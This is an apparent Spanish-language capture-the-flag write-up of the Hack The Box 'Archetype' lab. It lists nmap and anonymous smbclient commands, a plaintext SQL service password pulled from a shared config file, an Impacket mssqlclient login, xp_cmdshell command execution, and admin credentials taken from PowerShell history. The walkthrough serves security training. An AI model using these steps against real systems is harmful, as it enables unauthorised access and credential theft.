writeups/htb-archetype.md
Reconocimiento
Empezamos con un escaneo de puertos usando nmap:
nmap -sC -sV -oA nmap/archetype 10.10.10.27
Se identificaron los siguientes servicios:
| Puerto | Servicio | Versión |
|---|---|---|
| 135 | MSRPC | Windows RPC |
| 139 | NetBIOS | SMB |
| 445 | SMB | Windows |
| 1433 | MSSQL | SQL Server 2017 |
Enumeración SMB
smbclient -L //10.10.10.27 -N
Encontramos el recurso compartido backups. Accedemos:
smbclient //10.10.10.27/backups -N
Descargamos prod.dtsConfig que contiene credenciales:
<UserID>ARCHETYPE\sql_svc</UserID>
<Password>M3g4c0rp123</Password>
Explotación MSSQL
Usamos mssqlclient.py de Impacket para conectarnos:
mssqlclient.py ARCHETYPE/sql_svc:[email protected] -windows-auth
Había que habilitar xp_cmdshell para ejecución de comandos.
Privilege Escalation
Revisando el historial de PowerShell encontramos las credenciales del administrador en ConsoleHost_history.txt.
Lecciones aprendidas
- Nunca almacenar credenciales en archivos de configuración compartidos
- El historial de PowerShell es un vector de ataque común
- SMB con autenticación nula sigue siendo frecuente en entornos internos